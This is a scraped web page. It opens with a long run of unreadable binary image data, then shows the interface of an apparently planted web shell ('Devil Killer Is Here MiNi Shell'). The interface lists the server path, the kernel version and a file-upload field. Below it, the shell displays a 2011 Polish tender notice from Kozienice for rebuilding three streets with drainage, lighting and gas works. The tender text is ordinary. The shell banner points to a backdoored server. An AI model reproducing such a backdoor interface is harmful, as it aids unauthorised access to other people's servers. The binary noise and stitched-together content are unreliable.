JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110110/10319-N-2011.html

<p class="kh_header"><b>Kozienice: Przebudowa ulic na Osiedlu Borki I wraz z infrastrukturą - ul. Borki, Przytulna, Przyjaciół</b><br>
<b>Numer ogłoszenia: 10319 - 2011; data zamieszczenia: 10.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulic na Osiedlu Borki I wraz z infrastrukturą - ul. Borki, Przytulna, Przyjaciół.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest przebudowa ulic na Osiedlu Borki I wraz z infrastrukturą towarzyszącą - ul. Borki, Przytulna, Przyjaciół.  Zadanie będzie realizowane w oparciu o projekt przebudowy ulic na Osiedlu Borki I w Kozienicach - ul. Przyjaciół, Przytulna, Borki (branża drogowa i organizacja ruchu, elektryczna, sanitarna: kanalizacja deszczowa, sieć gazowa,), zgodnie z zasadami wiedzy technicznej i sztuki budowlanej z uwzględnieniem wymagań określonych w szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz z zachowaniem warunków określonych w siwz.
Zakres robót:
1. Roboty drogowe:
1.1. Roboty przygotowawcze: pomiarowe; rozbiórkowe w tym: rozebranie nawierzchni z trylinki i bloczków betonowych, nawierzchni z kostki brukowej, nawierzchni betonowej, chodników z płyt chodnikowych betonowych, krawężników i obrzeży betonowych,; załadunek i wywóz gruzu z rozbiórki, regulacja wysokościowa bram wjazdowych i nawierzchni terenu posesji; ziemne w tym: wykopy i przekopy, profilowanie i zagęszczanie podłoża.
1.2.	Budowa nawierzchni jezdni:
1.2.1.	Ulica Przyjaciół ( odcinek od ul. Rodzinnej do ul. Przytulnej szer. 5,5 m, odcinek od ul. Przytulnej do ul. Piłsudskiego szer. 6,0 m) i ulica Przytulna ( od ul. Gwiazdkowej do ul. Borki szer. 5,5 m) - częściowa rozbiórka istniejącej nawierzchni w ul. Przyjaciół, wykonanie nawierzchni bitumicznej z betonu asfaltowego na istniejącej nawierzchni z bloczków betonowych; chodniki obustronne o szerokości 1,5-2,0 m.
1.2.2.	Ulica Borki - rozbiórka istniejącej nawierzchni z bloczków, wykonanie koryta oraz nowej konstrukcji jezdni w postaci podbudowy tłuczniowej i nawierzchni z kostki brukowej betonowej szer. 4,5 m plus pobocza utwardzone szer. 1,0 - 1,5 m.
Konstrukcja nawierzchni ul. Przyjaciół i Przytulnej:
- nawierzchnia bitumiczna warstwa ścieralna z betonu asfaltowego gr. 4 cm,
- warstwa wyrównawcza z betonu asfaltowego,
- istniejąca podbudowa z bloczków betonowych,
W miejscach rozbiórki nawierzchni z bloczków:
- nawierzchnia bitumiczna warstwa ścieralna z betonu asfaltowego gr. 4 cm,
- nawierzchnia bitumiczna warstwa wiążąca z betonu asfaltowego gr. 4 cm,
- górna warstwa podbudowy z tłucznia łamanego stabilizowanego mechanicznie ( mieszanka sortowana 0-31,5 mm) gr. 8 cm,
- dolna warstwa podbudowy z tłucznia łamanego stabilizowanego mechanicznie ( mieszanka sortowana 0-63,5 mm) gr. 15 cm
- warstwa odsączająca z piasku gr. 10 cm.
Uwaga: w ul. Przyjaciół i Przytulnej nawierzchnię z mieszanki mineralno-bitumicznej należy zaprojektować i wykonać dla ruchu KR 3-6.
Konstrukcja nawierzchni ul. Borki:
- nawierzchnia z kostki brukowej betonowej szarej gr. 8 cm (Behaton)
- górna warstwa podbudowy z tłucznia łamanego stabilizowanego mechanicznie ( mieszanka sortowana 0-31,5 mm) gr. 8 cm,
- dolna warstwa podbudowy z tłucznia łamanego stabilizowanego mechanicznie ( mieszanka sortowana 0-63,5 mm) gr. 15 cm,
- warstwa odsączająca z piasku gr. 10 cm.
Krawężniki betonowe wibroprasowane 15x30cm na ławie betonowej z oporem betonu B15.
1.3.	Chodniki i zjazdy:
Chodniki dwustronne na całej długości ulicy Przytulnej, w ulicy Przyjaciół na odcinku od ul. Rodzinnej do ul. Przytulnej. W ulicy Przyjaciół na odcinku od ul. Przytulnej do ulicy Piłsudskiego chodniki istniejące bez zmian. Krawężniki bezpośrednio przy jezdni. Chodniki dostosować do fundamentów ogrodzeń. Wjazdy dostosować do wysokości bram. W niektórych przypadkach należy wykonać regulacje bram wjazdowych i nawierzchni terenu prywatnych posesji w celu dostosowania posadowienia chodników i wjazdów.
Konstrukcja chodników i wjazdów:
- nawierzchnia z kostki kolorowej beżowej lub jasnobrązowej (Nostalit) gr. 8 cm na podsypce cementowo-piaskowej,
- podbudowa z tłucznia stabilizowanego mechanicznie - mieszanka sortowana 0/31,5mm gr. 15 cm,
- warstwa odsączająca z piasku gr. 10 cm.
Uwaga: należy przewidzieć wykonanie dodatkowego wjazdu na posesję położoną przy ul. Przyjaciół 35 - wniosek mieszkańców.
Na dojściach do przejść dla pieszych należy przy obniżonym krawężniku ułożyć pas szerokości 0,5m z elementów betonowych z elementami wypukłymi sygnalizującymi dojście do przejścia osobom niewidomym.
1.4.	Odwodnienie - kanalizacja deszczowa
1.4.1.	Rozbudowa kanalizacji deszczowej:
- przedłużenie istniejącego kolektora w ul. Przyjaciół - wykonanie kolektora z rur PCV śr. 250mm z podłączeniem do istniejącej studni rewizyjnej Si, ustawieniem studni rewizyjnych żelbetowych śr. 1000: S1- (na skrzyżowaniu ulic Przyjaciół i Przytulne)j i S2 i S3 w dalszym odcinku ulicy Przyjaciół,
- rozbudowa kanalizacji deszczowej w ulicy Przytulnej - kolektor z rur PCV śr. 250mm wraz z ustawieniem studni rewizyjnych żelbetowych śr. 1000: S4 - S8,
- wykonanie wpustów ulicznych K1-K16 żeliwnych typu ciężkiego na studzienkach żelbetowych z osadnikiem śr. 500mm z przykanalikami z rur PCV śr. 150mm podłączonymi do w/w studni rewizyjnych
1.4.2. Przebudowa istniejącej kanalizacji deszczowej:
- rozbiórka istniejących wpustów, studzienek i przykanalików na skrzyżowaniu ulic Przytulnej i Przyjaciół, w ich miejsce wpusty K5 i K6,
- przesunięcie istniejącego wpustu na w/w skrzyżowaniu związane z korektą łuku,
- regulacja pozostałych wpustów ulicznych.
Uwaga: Na projektowanych studniach kanalizacji deszczowej i istniejących studniach kanalizacji sanitarnej zamontować pierścienie odciążające i włazy typu ciężkiego. Płyty nastudzienne oraz pierścienie odciążające należy dobrać do średnicy studni.
2. Roboty elektroenergetyczne
Istniejąca linia oświetleniowa podlega przebudowie i modernizacji polegającej na wymianie istniejących słupów oświetleniowych na słupy stalowe ośmiokątne zbieżne z oprawami sodowymi 100 W i zmianie lokalizacji słupów. Na istniejące kable nałożyć rury ochronne we wjazdach na posesje. Zakres prac:
- przebudowa przyłączy,
- wymiana przyłączy, 
- budowa linii rozdzielczej i oświetleniowej,
- przełożenie opraw oświetleniowych,
- demontaż istniejących słupów oświetleniowych z wysięgnikami,
- demontaż opraw oświetleniowych,
- demontaż przewodów i przyłączy,
- ustawienie słupów oświetleniowych wys. 8m z wysięgnikiem 0,5mx1,5m
- montaż opraw sodowych 100W,
- badania i pomiary instalacji,
Uwaga:
- demontaż 7 kpl. opraw z wysięgnikami na terenie miasta Kozienice,
- montaż 7 kpl. opraw z wysięgnikami ( oprawy i wysięgniki pochodzące z demontażu oświetlenia w ul. Przyjaciół - odcinek od ul. Rodzinnej do ul. Przytulnej) na terenie miasta Kozienice, w miejscu wskazanym przez Zamawiającego.
Zdemontowane słupy wraz z oprawami oświetlenia, przewody oraz złom stalowy należy zdać właścicielowi - Rejonowemu Zakładowi Energetycznemu w Kozienicach (z wyjątkiem 7 kpl. opraw i wysięgników z demontażu oświetlenia w ul. Przyjaciół - odcinek od ul. Rodzinnej do ul. Przytulnej)
3.Przebudowa sieci gazowej
3.1. Przebudowa gazociągu w ul. Przytulnej na odcinku od skrzyżowania z ul. Szczęśliwą i ul. Borki do skrzyżowania z ul. Przyjaciół, w tym:
- przebudowa gazociągu stalowego na gazociąg z rur śr. 40mm PE 100, SDR 11; 
- przebudowa przyłączy gazu z rur śr. 32mm, PE 100, SDR 11 wraz z przełączeniem przyłączy do przebudowanego gazociągu,
- montaż niezbędnej armatury gazowej, w tym montaż sączków węchowych z wyprowadzeniem do obudowanych skrzynek ulicznych,
-istniejącą armaturę gazową i kolidującą sieć gazową należy wyprowadzić poza krawędź projektowanej drogi z zachowaniem zalecanych odległości od krawężników i obsadzić nawiązując do poziomu przebudowanej nawierzchni, rury ochronne wyprowadzić poza krawędź projektowanej drogi,
- montaż rur ochronnych.
3.2. Zabezpieczenie istniejącej sieci gazowej w ul. Przyjaciół, Przytulnej, Borki
- montaż lub dostosowanie armatury gazowej do poziomu projektowanej nawierzchni,
- montaż lub przedłużenie rur ochronnych, 
- obniżenie (regulacja) posadowienia gazociągu i przyłączy,
- przesunięcie gazociągu poza krawędź projektowanej drogi.
Uwaga: Prace wykonać zgodnie z warunkami technicznymi wydanymi przez Mazowiecką Spółkę Gazownictwa Sp. z o.o. Zakład Gazowniczy w Radomiu w zakresie dotyczącym przebudowy gazociągu i warunków zabezpieczenia istniejącej sieci gazowej w ul. Przyjaciół, Przytulnej i Borki. Po zakończeniu przebudowy dokonać odpowietrzenia  i próby szczelności sieci i przyłączy gazowych. 
4.Organizacja ruchu:
- tymczasowa na czas prowadzenia robót - opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzyskaniem wymaganych zezwoleń, w tym zajęcie pasa drogowego oraz zgodne z przepisami oznakowanie ich na czas prowadzenia robót. Wykonawca nie ponosi kosztów z tytułu zajęcia pasa drogowego drogi gminnej w związku z realizacją zamówienia. 
- stała - oznakowanie pionowe i poziome zgodnie z projektem organizacji ruchu. 
5. Roboty uzupełniające:
5.1.	Wszelkie roboty przygotowawcze i porządkowe.
5.2.	Wytyczenie, bieżąca obsługa i geodezyjna inwentaryzacja powykonawcza obiektu w 5 egzemplarzach wraz z zestawieniem ilościowym poszczególnych obiektów tj. nawierzchni utwardzonych (jezdni, zjazdów, chodników) sieci: gazowej, przyłączy, kanalizacji deszczowej i studni, przykanalików i krat, energetycznej - słupów i linii energetycznych,
5.3.	Montaż rur osłonowych na istniejące przyłącza i linie kablowe.
5.4.	Wywóz i utylizacja materiałów z rozbiórki na koszt wykonawcy.
5.5.	Przywrócenie gruntów zajętych w czasie realizacji inwestycji do stanu pierwotnego sprzed ich zajęcia.
5.6.	Regulacja wysokościowa urządzeń podziemnych (włazy, włazy, studnie, zasuwy, zawory itp.) do projektowanych rzędnych.
5.7.	Regulacja bram wjazdowych na prywatne posesje i regulacja wysokościowa nawierzchni terenu posesji w celu dostosowania wysokości posadowienia wjazdów i chodników w obrębie posesji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do wysokości 50% zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.10.00.00-8, 45.23.00.00-8, 45.23.31.00-0, 45.23.30.00-9, 45.23.32.53-7, 45.00.00.00-7, 45.23.12.00-7, 45.33.30.00-0, 45.32.14.00-9, 45.31.51.00-9, 45.31.43.10-7, 31.52.72.00-8, 45.23.22.10-7, 31.32.11.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia - że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał, co najmniej jedno zamówienie obejmujące wykonanie nawierzchni z masy bitumicznej lub nawierzchni z kostki betonowej o łącznej powierzchni 3500 m2 i załączy dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia - że dysponuje co najmniej jedną osobą posiadającą kwalifikacje zawodowe do kierowania robotami budowlanymi tj. osobą posiadającą uprawnienia budowlane w rozumieniu przepisów ustawy z dn. 7 lipca 1994r. Prawo Budowlane ( Dz.U. z 2006r. Nr 156, poz. 1118 ze zm.) w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,

b)	dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,

c)	w przypadku, gdy wykonawca będzie polegać na wiedzy, doświadczeniu i osobach zdolnych do wykonania zamówienia innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, do oferty należy dołączyć:
- pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( np. wg wzoru - załącznik nr 7 lub inny równoważny dokument- patrz uwaga do punktu 8.1.2.1.).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a/ terminu wykonania zadania w następujących przypadkach:
	-   niesprzyjających warunków pogodowych,
	-   niedopełnieniu przez Zamawiającego jego obowiązków wynikających z umowy,
                -   z powodu uzasadnionych zmian  w zakresie sposobu wykonania przedmiotu zamówienia proponowanych  
                  przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego, 
               -  z powodu wystąpienia dodatkowych , a niemożliwych do przewidzenia przed zawarciem umowy przez 
                  doświadczonego wykonawcę, robót,
               -  z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki 
                  zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego   
                  bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
                                 -  z powodu stanu wyższej konieczności, powodującego podjęcie działań w celu uchylenia bezpośredniego
                                niebezpieczeństwa grożącego dobru społecznemu lub jakiemukolwiek dobru jednostki,
               -  z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są 
                  konsekwencją winy którejkolwiek ze stron,
	 -  zawieszenie wykonania prac nie spowodowanych uchybieniami Wykonawcy,
/wówczas strony ustalą nowe terminy realizacji, z tym ze minimalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy/.
b/ w przypadku zaistnienia potrzeby zmiany rozwiązań technicznych, gdy proponowane rozwiązanie jest równorzędne lub lepsze funkcjonalnie od zaproponowanego w projekcie a jednocześnie nie spowoduje zwiększenia kosztów,
c/ gdy wystąpiły takie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i na które strony nie miały wpływu,
d/ w przypadku zaistnienia uzasadnionej potrzeby zmiany podwykonawcy. 
Jeżeli Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu posługiwał się zasobami dotychczasowego podwykonawcy, zmiana podwykonawcy możliwa jest po przedłożeniu przez Wykonawcę dokumentów potwierdzających spełnienie warunków udziału w postępowaniu przez zaproponowanego podwykonawcę.
e/ gdy nastąpi zmiana stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego.
f/ gdy nastąpi zmiana przepisów prawnych mających wpływ na realizację umowy, w szczególności na jej zakres, termin,
g/gdy nastąpi zmiana formy organizacyjno - prawnej lub siedziby Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach, ul. Parkowa 5, 26-900 Kozienice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2011 godzina 11:45, miejsce: Urząd Miejski w Kozienicach, ul. Parkowa 5, 26-900 Kozienice, pok. nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





